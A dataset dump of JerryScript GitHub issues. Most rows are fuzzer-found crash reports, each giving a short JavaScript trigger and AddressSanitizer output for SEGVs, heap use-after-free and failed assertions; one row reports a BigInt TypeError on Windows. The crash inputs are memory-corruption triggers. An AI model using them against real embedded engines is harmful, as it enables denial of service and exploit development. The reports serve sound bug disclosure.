issue_owner_repo
listlengths 2
2
| issue_body
stringlengths 0
261k
⌀ | issue_title
stringlengths 1
925
| issue_comments_url
stringlengths 56
81
| issue_comments_count
int64 0
2.5k
| issue_created_at
stringlengths 20
20
| issue_updated_at
stringlengths 20
20
| issue_html_url
stringlengths 37
62
| issue_github_id
int64 387k
2.46B
| issue_number
int64 1
127k
|
---|---|---|---|---|---|---|---|---|---|
[
"jerryscript-project",
"jerryscript"
]
|
###### JerryScript revision
2faafa4
###### Build platform
Ubuntu 18.04.5 LTS(Linux 4.15.0-119-generic x86_64)
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g --strip=off \
--system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \
--error-messages=on --profile=es2015-subset --builddir=$PWD/build
```
###### Test case
```
throw new SyntaxError("[0: 98, 1: 54, 8: false, 10: 21, foo: bar]");
```
###### Output
```
Error: Failed to open file: 0
ASAN:DEADLYSIGNAL
=================================================================
==13994==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000 (pc 0x5678dd4b bp 0xffca4f88 sp 0xffca4d10 T0)
==13994==The signal is caused by a READ memory access.
==13994==Hint: address points to the zero page.
#0 0x5678dd4a in main_print_unhandled_exception /root/jerryscript/jerry-main/main-utils.c:341
#1 0x5678baae in main /root/jerryscript/jerry-main/main-unix.c:140
#2 0xf7760f20 in __libc_start_main (/lib32/libc.so.6+0x18f20)
#3 0x5662c3d0 (/root/jerryscript/build/bin/jerry+0x1d3d0)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/jerryscript/jerry-main/main-utils.c:341 in main_print_unhandled_exception
==13994==ABORTING
```
Credits: Found by chong from OWL337. | SEGV in main_print_unhandled_exception | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4403/comments | 0 | 2021-01-02T14:31:59Z | 2021-01-08T15:03:34Z | https://github.com/jerryscript-project/jerryscript/issues/4403 | 777,469,465 | 4,403 |
[
"jerryscript-project",
"jerryscript"
]
|
###### JerryScript revision
2faafa4
###### Build platform
Ubuntu 18.04.5 LTS(Linux 4.15.0-119-generic x86_64)
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g --strip=off \
--system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \
--error-messages=on --profile=es2015-subset --builddir=$PWD/build
```
###### Test case
```
var p = new Proxy(Function(), { get: function closure() { eval("o.p.y"); delete closure; return closure == arguments.callee && !(new String(undefined)); }});
Function.prototype.bind.call(p);
```
###### Output
```
ReferenceError: o is not defined
ASAN:DEADLYSIGNAL
=================================================================
==24756==ERROR: AddressSanitizer: SEGV on unknown address 0xbebebeb8 (pc 0x56782398 bp 0xff8c72d8 sp 0xff8c72b0 T0)
==24756==The signal is caused by a READ memory access.
#0 0x56782397 in ecma_deref_bigint /root/jerryscript/jerry-core/ecma/base/ecma-helpers.c:1264
#1 0x5677d2c5 in ecma_free_value /root/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:1147
#2 0x567c10fc in ecma_gc_free_object /root/jerryscript/jerry-core/ecma/base/ecma-gc.c:1742
#3 0x567c1e68 in ecma_gc_run /root/jerryscript/jerry-core/ecma/base/ecma-gc.c:1898
#4 0x5678385a in ecma_finalize /root/jerryscript/jerry-core/ecma/base/ecma-init-finalize.c:83
#5 0x567acb1d in jerry_cleanup /root/jerryscript/jerry-core/api/jerry.c:256
#6 0x567a7a9c in main /root/jerryscript/jerry-main/main-unix.c:324
#7 0xf774af20 in __libc_start_main (/lib32/libc.so.6+0x18f20)
#8 0x566473d0 (/root/jerryscript/build/bin/jerry+0x1d3d0)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/jerryscript/jerry-core/ecma/base/ecma-helpers.c:1264 in ecma_deref_bigint
==24756==ABORTING
```
Credits: Found by chong from OWL337. | SEVG in ecma_deref_bigint | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4402/comments | 0 | 2021-01-02T14:29:48Z | 2021-01-07T11:10:55Z | https://github.com/jerryscript-project/jerryscript/issues/4402 | 777,469,127 | 4,402 |
[
"jerryscript-project",
"jerryscript"
]
|
###### JerryScript revision
2faafa4
###### Build platform
Ubuntu 18.04.5 LTS(Linux 4.15.0-119-generic x86_64)
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g --strip=off \
--system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \
--error-messages=on --profile=es2015-subset --builddir=$PWD/build
```
###### Test case
```
var arr = new Float64Array();
arr.reduceRight(function(t) {}, 'Registration');
```
###### Output
```
=================================================================
==31022==ERROR: AddressSanitizer: heap-use-after-free on address 0xf5b00910 at pc 0x56791b61 bp 0xffdffe68 sp 0xffdffe58
READ of size 4 at 0xf5b00910 thread T0
#0 0x56791b60 in ecma_free_string_list /root/jerryscript/jerry-core/ecma/base/ecma-literal-storage.c:77
#1 0x56791f4f in ecma_finalize_lit_storage /root/jerryscript/jerry-core/ecma/base/ecma-literal-storage.c:154
#2 0x56790979 in ecma_finalize /root/jerryscript/jerry-core/ecma/base/ecma-init-finalize.c:103
#3 0x567b9b1d in jerry_cleanup /root/jerryscript/jerry-core/api/jerry.c:256
#4 0x567b4a9c in main /root/jerryscript/jerry-main/main-unix.c:324
#5 0xf778bf20 in __libc_start_main (/lib32/libc.so.6+0x18f20)
#6 0x566543d0 (/root/jerryscript/build/bin/jerry+0x1d3d0)
0xf5b00910 is located 0 bytes inside of 21-byte region [0xf5b00910,0xf5b00925)
freed by thread T0 here:
#0 0xf7a4fb94 in __interceptor_free (/usr/lib32/libasan.so.4+0xe5b94)
#1 0x5670f5d4 in jmem_heap_free_block_internal /root/jerryscript/jerry-core/jmem/jmem-heap.c:478
#2 0x5670f97f in jmem_heap_free_block /root/jerryscript/jerry-core/jmem/jmem-heap.c:692
#3 0x5670dca6 in ecma_dealloc_string_buffer /root/jerryscript/jerry-core/ecma/base/ecma-alloc.c:236
#4 0x567def54 in ecma_destroy_ecma_string /root/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:936
#5 0x567dec07 in ecma_deref_ecma_string /root/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:894
#6 0x5678a09f in ecma_free_value /root/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:1126
#7 0x567bcebe in jerry_release_value /root/jerryscript/jerry-core/api/jerry.c:1859
#8 0x567b3af5 in main /root/jerryscript/jerry-main/main-unix.c:144
#9 0xf778bf20 in __libc_start_main (/lib32/libc.so.6+0x18f20)
previously allocated by thread T0 here:
#0 0xf7a4ff54 in malloc (/usr/lib32/libasan.so.4+0xe5f54)
#1 0x5670f28c in jmem_heap_alloc /root/jerryscript/jerry-core/jmem/jmem-heap.c:254
#2 0x5670f36a in jmem_heap_gc_and_alloc_block /root/jerryscript/jerry-core/jmem/jmem-heap.c:291
#3 0x5670f3fc in jmem_heap_alloc_block /root/jerryscript/jerry-core/jmem/jmem-heap.c:325
#4 0x5670dc83 in ecma_alloc_string_buffer /root/jerryscript/jerry-core/ecma/base/ecma-alloc.c:222
#5 0x567db63e in ecma_new_ecma_string_from_utf8_buffer /root/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:263
#6 0x567db63e in ecma_new_ecma_string_from_utf8 /root/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:357
#7 0x56792004 in ecma_find_or_create_literal_string /root/jerryscript/jerry-core/ecma/base/ecma-literal-storage.c:170
#8 0x5671beea in parser_post_processing /root/jerryscript/jerry-core/parser/js/js-parser.c:1312
#9 0x5672043a in parser_parse_source /root/jerryscript/jerry-core/parser/js/js-parser.c:2019
#10 0x5672490a in parser_parse_script /root/jerryscript/jerry-core/parser/js/js-parser.c:2799
#11 0x567ba359 in jerry_parse /root/jerryscript/jerry-core/api/jerry.c:459
#12 0x567b3859 in main /root/jerryscript/jerry-main/main-unix.c:112
#13 0xf778bf20 in __libc_start_main (/lib32/libc.so.6+0x18f20)
SUMMARY: AddressSanitizer: heap-use-after-free /root/jerryscript/jerry-core/ecma/base/ecma-literal-storage.c:77 in ecma_free_string_list
Shadow bytes around the buggy address:
0x3eb600d0: fa fa fa fa fa fa fa fa fa fa fd fd fd fa fa fa
0x3eb600e0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa
0x3eb600f0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
0x3eb60100: fd fa fa fa fd fd fd fd fa fa fd fd fd fa fa fa
0x3eb60110: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa
=>0x3eb60120: fa fa[fd]fd fd fa fa fa fd fd fd fd fa fa fd fd
0x3eb60130: fd fa fa fa fd fd fd fd fa fa fd fd fd fa fa fa
0x3eb60140: fd fd fd fd fa fa fd fd fd fa fa fa fd fd fd fa
0x3eb60150: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
0x3eb60160: fd fa fa fa fd fd fd fd fa fa fd fd fd fd fa fa
0x3eb60170: fd fd fd fd fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==31022==ABORTING
```
Credits: Found by chong from OWL337. | heap-use-after-free in ecma_free_string_list | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4401/comments | 1 | 2021-01-02T14:26:41Z | 2021-01-05T19:58:26Z | https://github.com/jerryscript-project/jerryscript/issues/4401 | 777,468,703 | 4,401 |
[
"jerryscript-project",
"jerryscript"
]
|
###### JerryScript revision
2faafa4
###### Build platform
Ubuntu 18.04.5 LTS(Linux 4.15.0-119-generic x86_64)
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g --strip=off \
--system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \
--error-messages=on --profile=es2015-subset --builddir=$PWD/build
```
###### Test case
```
var arr = new Int32Array(0);
arr.reduceRight(Math.asinh, 0.00001);
```
###### Output
```
=================================================================
==11298==ERROR: AddressSanitizer: heap-use-after-free on address 0xf5d00650 at pc 0x566dfe24 bp 0xff8a9ca8 sp 0xff8a9c98
READ of size 4 at 0xf5d00650 thread T0
#0 0x566dfe23 in jmem_pools_collect_empty /root/jerryscript/jerry-core/jmem/jmem-poolman.c:165
#1 0x566df9b0 in jmem_pools_finalize /root/jerryscript/jerry-core/jmem/jmem-poolman.c:44
#2 0x566def76 in jmem_finalize /root/jerryscript/jerry-core/jmem/jmem-allocator.c:161
#3 0x56789dc0 in jerry_cleanup /root/jerryscript/jerry-core/api/jerry.c:272
#4 0x56784a9c in main /root/jerryscript/jerry-main/main-unix.c:324
#5 0xf7785f20 in __libc_start_main (/lib32/libc.so.6+0x18f20)
#6 0x566243d0 (/root/jerryscript/build/bin/jerry+0x1d3d0)
0xf5d00650 is located 0 bytes inside of 8-byte region [0xf5d00650,0xf5d00658)
freed by thread T0 here:
#0 0xf7a49b94 in __interceptor_free (/usr/lib32/libasan.so.4+0xe5b94)
#1 0x566df5d4 in jmem_heap_free_block_internal /root/jerryscript/jerry-core/jmem/jmem-heap.c:478
#2 0x566dfe38 in jmem_pools_collect_empty /root/jerryscript/jerry-core/jmem/jmem-poolman.c:168
#3 0x566df9b0 in jmem_pools_finalize /root/jerryscript/jerry-core/jmem/jmem-poolman.c:44
#4 0x566def76 in jmem_finalize /root/jerryscript/jerry-core/jmem/jmem-allocator.c:161
#5 0x56789dc0 in jerry_cleanup /root/jerryscript/jerry-core/api/jerry.c:272
#6 0x56784a9c in main /root/jerryscript/jerry-main/main-unix.c:324
#7 0xf7785f20 in __libc_start_main (/lib32/libc.so.6+0x18f20)
previously allocated by thread T0 here:
#0 0xf7a49f54 in malloc (/usr/lib32/libasan.so.4+0xe5f54)
#1 0x566df28c in jmem_heap_alloc /root/jerryscript/jerry-core/jmem/jmem-heap.c:254
#2 0x566df36a in jmem_heap_gc_and_alloc_block /root/jerryscript/jerry-core/jmem/jmem-heap.c:291
#3 0x566df3da in jmem_heap_alloc_block_internal /root/jerryscript/jerry-core/jmem/jmem-heap.c:310
#4 0x566dfb31 in jmem_pools_alloc /root/jerryscript/jerry-core/jmem/jmem-poolman.c:85
#5 0x566ddafa in ecma_alloc_number /root/jerryscript/jerry-core/ecma/base/ecma-alloc.c:57
#6 0x567b7c4b in ecma_create_float_number.lto_priv.938 /root/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:515
#7 0x567b9080 in ecma_copy_value /root/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:891
#8 0x567b93ea in ecma_fast_copy_value /root/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:944
#9 0x566c4da6 in vm_loop /root/jerryscript/jerry-core/vm/vm.c:1115
#10 0x566dd48a in vm_execute /root/jerryscript/jerry-core/vm/vm.c:4953
#11 0x566ddad3 in vm_run /root/jerryscript/jerry-core/vm/vm.c:5060
#12 0x566c1ef5 in vm_run_global /root/jerryscript/jerry-core/vm/vm.c:350
#13 0x5678a7a9 in jerry_run /root/jerryscript/jerry-core/api/jerry.c:608
#14 0x5678398c in main /root/jerryscript/jerry-main/main-unix.c:123
#15 0xf7785f20 in __libc_start_main (/lib32/libc.so.6+0x18f20)
SUMMARY: AddressSanitizer: heap-use-after-free /root/jerryscript/jerry-core/jmem/jmem-poolman.c:165 in jmem_pools_collect_empty
Shadow bytes around the buggy address:
0x3eba0070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3eba0080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3eba0090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3eba00a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3eba00b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x3eba00c0: fa fa fa fa fa fa fa fa fa fa[fd]fa fa fa fd fd
0x3eba00d0: fa fa 00 00 fa fa fd fa fa fa fd fa fa fa fd fd
0x3eba00e0: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa fd fd
0x3eba00f0: fa fa fd fd fa fa 00 00 fa fa fa fa fa fa fa fa
0x3eba0100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3eba0110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==11298==ABORTING
```
Credits: Found by chong from OWL337. | heap-use-after-free in jmem_pools_collect_empty | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4400/comments | 1 | 2021-01-02T14:23:31Z | 2021-01-05T19:58:14Z | https://github.com/jerryscript-project/jerryscript/issues/4400 | 777,468,289 | 4,400 |
[
"jerryscript-project",
"jerryscript"
]
|
###### JerryScript revision
2faafa4
###### Build platform
Ubuntu 18.04.5 LTS(Linux 4.15.0-119-generic x86_64)
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g --strip=off \
--system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \
--error-messages=on --profile=es2015-subset --builddir=$PWD/build
```
###### Test case
```
var obj0 = {};
var obj1 = {};
var obj2 = [];
var obj3 = new Proxy(Function(), { get: function(o, k) { get.push(k); return o[k]; }});
var obj4 = new Error();
var obj5 = JSON;
var values = [
[ obj0, 0 ],
[ obj1, 1 ],
[ obj2, 2 ],
[ obj3, 3 ],
[ obj4, 4 ],
[ obj5, 5 ],
[ obj4, 4 ],
[ obj3, 3 ],
[ obj2, 2 ],
[ obj1, 1 ],
[ obj0, 0 ],
];
var map = new WeakMap(values);
```
###### Output
```
ICE: Assertion 'uint_ptr % JMEM_ALIGNMENT == 0' failed at /root/jerryscript/jerry-core/jmem/jmem-allocator.c(jmem_decompress_pointer):222.
Error: ERR_FAILED_INTERNAL_ASSERTION
Aborted
```
Credits: Found by chong from OWL337. | Assertion 'uint_ptr % JMEM_ALIGNMENT == 0' in jmem_decompress_pointer | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4399/comments | 0 | 2021-01-02T14:20:48Z | 2021-01-07T10:54:00Z | https://github.com/jerryscript-project/jerryscript/issues/4399 | 777,467,925 | 4,399 |
[
"jerryscript-project",
"jerryscript"
]
|
###### JerryScript revision
2faafa4
###### Build platform
Ubuntu 18.04.5 LTS(Linux 4.15.0-119-generic x86_64)
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g --strip=off \
--system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \
--error-messages=on --profile=es2015-subset --builddir=$PWD/build
```
###### Test case
```
var get = [];
var constructor = Function();
constructor[Symbol.species] = Object;
var p = new Proxy({ constructor: constructor, flags: '', exec: function() { return null; } }, { set: function (x) { this.set = x === 42; } });
RegExp.prototype[Symbol.split].call(p, 7996);
```
###### Output
```
ICE: Assertion 'ecma_is_value_true (result)' failed at /root/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c(ecma_regexp_split_helper):2277.
Error: ERR_FAILED_INTERNAL_ASSERTION
Aborted
```
Credits: Found by chong from OWL337. | Assertion 'ecma_is_value_true (result)' in ecma_regexp_split_helper | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4398/comments | 0 | 2021-01-02T14:17:09Z | 2021-01-07T16:25:29Z | https://github.com/jerryscript-project/jerryscript/issues/4398 | 777,467,460 | 4,398 |
[
"jerryscript-project",
"jerryscript"
]
|
###### JerryScript revision
2faafa4
###### Build platform
Ubuntu 18.04.5 LTS(Linux 4.15.0-119-generic x86_64)
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g --strip=off \
--system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \
--error-messages=on --profile=es2015-subset --builddir=$PWD/build
```
###### Test case
```
var arr = new Float64Array();
arr.reduceRight(SyntaxError, function() {
RegExp("[\\s-a]", "u");
}, 'RegExp("[\\s-a]", "u"): ');
```
###### Output
```
ICE: Assertion 'object_p->type_flags_refs >= ECMA_OBJECT_REF_ONE' failed at /root/jerryscript/jerry-core/ecma/base/ecma-gc.c(ecma_deref_object):148.
Error: ERR_FAILED_INTERNAL_ASSERTION
Aborted
```
Credits: Found by chong from OWL337. | Assertion 'object_p->type_flags_refs >= ECMA_OBJECT_REF_ONE' in ecma_deref_object | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4397/comments | 0 | 2021-01-02T14:12:58Z | 2021-01-07T10:59:17Z | https://github.com/jerryscript-project/jerryscript/issues/4397 | 777,466,856 | 4,397 |
[
"jerryscript-project",
"jerryscript"
]
|
###### JerryScript revision
2faafa4
###### Build platform
Ubuntu 18.04.5 LTS(Linux 4.15.0-119-generic x86_64)
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g --strip=off \
--system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \
--error-messages=on --profile=es2015-subset --builddir=$PWD/build
```
###### Test case
```
var obj1 = new Proxy({length: 2, 0: '', 1: ''}, { get: function(o, k) { get.push(k); return o[k]; }});
var weakset = new WeakSet();
weakset.add(obj1);
```
###### Output
```
ICE: Assertion '(object_p->u1.property_list_cp & ~JMEM_TAG_MASK) == 0' failed at /root/jerryscript/jerry-core/ecma/base/ecma-gc.c(ecma_gc_free_object):1655.
Error: ERR_FAILED_INTERNAL_ASSERTION
Aborted
```
Credits: Found by chong from OWL337. | Assertion '(object_p->u1.property_list_cp & ~JMEM_TAG_MASK) == 0' in ecma_gc_free_object | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4396/comments | 0 | 2021-01-02T14:09:47Z | 2021-01-07T10:54:00Z | https://github.com/jerryscript-project/jerryscript/issues/4396 | 777,466,385 | 4,396 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
9676500addbcc5974bf81f7b3726230d26f5c1a5
###### Build platform
`python -c "import platform; print(platform.platform())"`
Windows-10-10.0.19041-SP0
###### Build steps
```
PS C:\work\study\languages\typescript\jerryscript> python tools/build.py --clean
-- Building for: Visual Studio 16 2019
-- Selecting Windows SDK version 10.0.19041.0 to target Windows 10.0.19042.
-- The C compiler identification is MSVC 19.27.29111.0
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Check for working C compiler: C:/Program Files (x86)/Microsoft Visual Studio/2019/BuildTools/VC/Tools/MSVC/14.27.29110/bin/Hostx64/x64/cl.exe - skipped
-- Detecting C compile features
-- Detecting C compile features - done
-- CMAKE_BUILD_TYPE MinSizeRel
-- CMAKE_C_COMPILER_ID MSVC
-- CMAKE_SYSTEM_NAME Windows
-- CMAKE_SYSTEM_PROCESSOR AMD64
-- BUILD_SHARED_LIBS OFF
-- ENABLE_LTO ON
-- ENABLE_STRIP OFF (FORCED BY COMPILER)
-- JERRY_VERSION 2.4.0
-- JERRY_CMDLINE ON
-- JERRY_CMDLINE_TEST OFF
-- JERRY_CMDLINE_SNAPSHOT OFF
-- JERRY_LIBFUZZER OFF (FORCED BY COMPILER)
-- JERRY_PORT_DEFAULT ON (FORCED BY CMDLINE OR LIBFUZZER OR TESTS)
-- JERRY_EXT ON (FORCED BY CMDLINE OR TESTS)
-- JERRY_LIBM OFF (FORCED BY COMPILER)
-- UNITTESTS OFF
-- DOCTESTS OFF
-- ENABLE_ALL_IN_ONE ON (FORCED BY COMPILER)
-- JERRY_CPOINTER_32_BIT OFF
-- JERRY_DEBUGGER OFF
-- JERRY_ERROR_MESSAGES OFF
-- JERRY_EXTERNAL_CONTEXT OFF
-- JERRY_PARSER ON
-- JERRY_LINE_INFO ON
-- JERRY_LOGGING OFF
-- JERRY_MEM_STATS OFF
-- JERRY_MEM_GC_BEFORE_EACH_ALLOC OFF
-- JERRY_PARSER_DUMP_BYTE_CODE OFF
-- JERRY_PROFILE es.next
-- JERRY_REGEXP_STRICT_MODE OFF
-- JERRY_REGEXP_DUMP_BYTE_CODE OFF
-- JERRY_SNAPSHOT_EXEC OFF
-- JERRY_SNAPSHOT_SAVE OFF
-- JERRY_SYSTEM_ALLOCATOR OFF
-- JERRY_VALGRIND OFF
-- JERRY_VM_EXEC_STOP OFF
-- JERRY_GLOBAL_HEAP_SIZE (512)
-- JERRY_GC_LIMIT (0)
-- JERRY_STACK_LIMIT (0)
-- JERRY_GC_MARK_LIMIT (8)
-- FEATURE_INIT_FINI OFF
-- Performing Test HAVE_TM_GMTOFF
-- Performing Test HAVE_TM_GMTOFF - Failed
-- Looking for include file time.h
-- Looking for include file time.h - not found
-- Looking for include file unistd.h
-- Looking for include file unistd.h - not found
-- ENABLE_LINK_MAP OFF
-- JERRY_TEST_STACK_MEASURE OFF
-- Configuring done
-- Generating done
-- Build files have been written to: C:/work/study/languages/typescript/jerryscript/build
用于 .NET Framework 的 Microsoft (R) 生成引擎版本 16.7.0+b89cb5fde
版权所有(C) Microsoft Corporation。保留所有权利。
Checking Build System
Building Custom Rule C:/work/study/languages/typescript/jerryscript/jerry-core/CMakeLists.txt
jerry-all-in.c
C:/work/study/languages/typescript/jerryscript/jerry-core/ecma/base/ecma-helpers-conversion.c(822,43): warning C4146: 一元负运算符应用于无符号类型,结果仍为无符号类型 [C:\work\study\languages\typescript\jerryscript\build\jerry-core\jerry-core.
vcxproj]
C:/work/study/languages/typescript/jerryscript/jerry-core/lit/lit-char-helpers.c(153,23): warning C4018: “<=”: 有符号/无符号不匹配 [C:\work\study\languages\typescript\jerryscript\build\jerry-core\jerry-core.vcxproj]
C:/work/study/languages/typescript/jerryscript/jerry-core/parser/js/js-scanner-util.c(2238,32): warning C4090: “函数”: 不同的“const”限定符 [C:\work\study\languages\typescript\jerryscript\build\jerry-core\jerry-core.vcxproj]
C:/work/study/languages/typescript/jerryscript/jerry-core/parser/js/js-scanner-util.c(2475,32): warning C4090: “函数”: 不同的“const”限定符 [C:\work\study\languages\typescript\jerryscript\build\jerry-core\jerry-core.vcxproj]
jerry-core.vcxproj -> C:\work\study\languages\typescript\jerryscript\build\lib\MinSizeRel\jerry-core.lib
Building Custom Rule C:/work/study/languages/typescript/jerryscript/jerry-ext/CMakeLists.txt
Building Custom Rule C:/work/study/languages/typescript/jerryscript/jerry-port/default/CMakeLists.txt
default-date.c
arg-js-iterator-helper.c
arg-transform-functions.c
arg.c
debugger-common.c
debugger-rp.c
debugger-serial.c
debugger-sha1.c
debugger-tcp.c
debugger-ws.c
handle-scope-allocator.c
C:\work\study\languages\typescript\jerryscript\jerry-ext\handle-scope\handle-scope-allocator.c(128,1): warning C4244: “初始化”: 从“__int64”转换到“long”,可能丢失数据 [C:\work\study\languages\typescript\jerryscript\build\jerry-ext\jer
ry-ext.vcxproj]
handle-scope.c
C:\work\study\languages\typescript\jerryscript\jerry-port\default\default-date.c(84,78): warning C4244: “return”: 从“LONGLONG”转换到“double”,可能丢失数据 [C:\work\study\languages\typescript\jerryscript\build\jerry-port\default\je
rry-port-default.vcxproj]
C:\work\study\languages\typescript\jerryscript\jerry-port\default\default-date.c(113,22): warning C4244: “return”: 从“time_t”转换到“double”,可能丢失数据 [C:\work\study\languages\typescript\jerryscript\build\jerry-port\default\jer
ry-port-default.vcxproj]
default-debugger.c
handler-assert.c
handler-gc.c
handler-print.c
handler-register.c
handler-resource-name.c
module.c
正在生成代码...
default-external-context.c
default-fatal.c
default-io.c
default-module.c
C:\work\study\languages\typescript\jerryscript\jerry-port\default\default-module.c(129,25): warning C4047: “函数”:“char *”与“char (*)[3]”的间接级别不同 [C:\work\study\languages\typescript\jerryscript\build\jerry-port\default\jerr
y-port-default.vcxproj]
C:\work\study\languages\typescript\jerryscript\jerry-port\default\default-module.c(129,19): warning C4024: “_splitpath_s”: 形参和实参 2 的类型不同 [C:\work\study\languages\typescript\jerryscript\build\jerry-port\default\jerry-por
t-default.vcxproj]
C:\work\study\languages\typescript\jerryscript\jerry-port\default\default-module.c(137,28): warning C4047: “函数”:“const char *”与“char (*)[3]”的间接级别不同 [C:\work\study\languages\typescript\jerryscript\build\jerry-port\defaul
t\jerry-port-default.vcxproj]
C:\work\study\languages\typescript\jerryscript\jerry-port\default\default-module.c(137,22): warning C4024: “strncat”: 形参和实参 2 的类型不同 [C:\work\study\languages\typescript\jerryscript\build\jerry-port\default\jerry-port-def
ault.vcxproj]
正在生成代码...
jerry-ext.vcxproj -> C:\work\study\languages\typescript\jerryscript\build\lib\MinSizeRel\jerry-ext.lib
jerry-port-default.vcxproj -> C:\work\study\languages\typescript\jerryscript\build\lib\MinSizeRel\jerry-port-default.lib
Building Custom Rule C:/work/study/languages/typescript/jerryscript/jerry-main/CMakeLists.txt
main-unix.c
main-utils.c
main-options.c
cli.c
正在生成代码...
jerry.vcxproj -> C:\work\study\languages\typescript\jerryscript\build\bin\MinSizeRel\jerry.exe
Building Custom Rule C:/work/study/languages/typescript/jerryscript/CMakeLists.txt
==============================
Build succeeded!
==============================
```
NodeJS output
```
Welcome to Node.js v14.15.1.
Type ".help" for more information.
> 243593253485081309523243243243242342342344362643646254254354467873247493759274385743987528437958739817589345n+128371928731279387219372189738972189372198372198748932174836159763956392176593153213123123123123123123212312232323232323232323232323232323232323232323232331231231231231n
128371928731279387219372189738972189372198372198748932174836403357209877257902676456366366365465465467574955878577486677700196479816991597618067219851670289971048820576n
>
```
QuickJs Output
```
qjs > 243593253485081309523243243243242342342344362643646254254354467873247493759274385743987528437958739817589345n+128
128371928731279387219372189738972189372198372198748932174836403357209877257902676456366366365465465467574955878577486677700196479816991597618067219851670289971048820576n
```
Jerry Output
```
PS C:\work\study\languages\typescript\jerryscript> C:\work\study\languages\typescript\jerryscript\build\bin\MinSizeRel\jerry.exe
jerry> 243593253485081309523243243243242342342344362643646254254354467873247493759274385743987528437958739817589345n+128371928731279387219372189738972189372198372198748932174836159763956392176593153213123123123123123123212312232323232323232323232323232323232323232323232331231231231231n
TypeError
```
The jerry unix shell
```
lygstate@DESKTOP-94PU0GB:/mnt/c/work/study/languages/typescript/jerryscript$ ./build/bin/jerry
jerry> 243593253485081309523243243243242342342344362643646254254354467873247493759274385743987528437958739817589345n+128371928731279387219372189738972189372198372198748932174836159763956392176593153213123123123123123123212312232323232323232323232323232323232323232323232331231231231231n
TypeError
jerry> 32323232331231231231231
jerry>
```
It's also have a problem, that nodejs output have a `n` suffix, but jerry doesn't have that.
